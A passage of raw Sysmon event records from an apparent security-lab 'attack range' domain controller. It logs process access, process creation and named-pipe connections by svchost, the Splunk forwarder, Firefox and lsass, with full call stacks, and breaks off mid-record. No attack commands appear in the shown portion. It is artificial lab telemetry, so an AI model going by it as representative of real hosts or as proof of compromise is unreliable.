11:29:19.698{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.698{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.698{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A8F-6216-8907-000000003802}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.702{C8EA50B7-1A8F-6216-8907-000000003802}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.584{C8EA50B7-F11F-6215-1500-000000003802}10921844C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.505{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000299749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 11:29:19.505{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.16.60670534C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000299748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.505{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000299747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 11:29:19.505{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000299746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.370{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B501026DF4E83ABF3D48584D25C742,SHA256=0CF23AD66A223B77AF780036E0A77719129A30D1CEF91891CC07E645B4A7CD52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.264{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.248{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.248{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.232{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.246{C8EA50B7-1A8F-6216-8807-000000003802}6756C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.16.606705346\1685234069" -parentBuildID 20220216172458 -prefsHandle 6636 -prefMapHandle 2656 -prefsLen 8443 -prefMapSize 251484 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 8896 157e653d448 socketC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000299737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.232{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.217{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 